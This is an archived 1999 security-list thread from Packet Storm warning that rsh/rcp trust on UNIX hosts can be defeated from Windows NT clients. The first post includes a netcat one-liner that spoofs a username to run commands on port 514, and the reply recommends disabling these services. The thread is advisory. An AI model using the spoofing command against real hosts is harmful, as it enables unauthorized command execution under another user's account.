nt.rsh.rcp.txt

1999-08-17T00:00:00
ID PACKETSTORM:12054
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Thu, 8 Apr 1999 19:11:54 -0700  
From: Eric Gisin <ericg@TECHIE.COM>  
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM  
Subject: rsh/rcp is not secure  
  
This is really a UNIX rshd bug, but it affects users of the NT clients.  
  
It's old news that the BSD rsh/rcp services are not secure, however rshd is  
still is enabled in many UNIX systems. There are rsh/rcp clients in Windows  
NT, and people are not aware of the ease of defeating security in this  
environment.  
  
The security of this service is based on privileged ports, which are not  
widely implemented. The NT versions of rcp/rsh have no special privileges  
like the UNIX versions. Anyone can modify the source or use netcat to fake  
the client username. For example,  
D:> nc -v unixhost 514 -p 666  
^@newbie^@newbie^@chmod a= .^@  
This will execute the chmod command under newbie's account, if he permits  
access from that client machine in .rhosts.  
  
Basically the problem is since Windows NT includes rsh/rcp, people assume  
it's as secure as the UNIX counterpart, which is not the case.  
  
--------------------------------------------------------------------------  
  
Date: Fri, 9 Apr 1999 09:28:04 -0700  
From: David LeBlanc <dleblanc@MINDSPRING.COM>  
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM  
Subject: Re: rsh/rcp is not secure  
  
At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:  
  
>Basically the problem is since Windows NT includes rsh/rcp, people assume  
>it's as secure as the UNIX counterpart, which is not the case.  
  
The UNIX counterpart isn't really all that secure in any case - it assumes  
that no one on the network can be root, and so come from a low port.  
  
Something else to think about is that running a rshd on NT isn't usually a  
good idea - several implementations run everything as LocalSystem, and the  
ones that don't store live user passwords.  
  
These utilities are full of other security holes - look at the checks in  
the various scanning products for some examples. Safest thing is just not  
to run rsh, rlogin and rexec.  
  
  
David LeBlanc  
dleblanc@mindspring.com  
`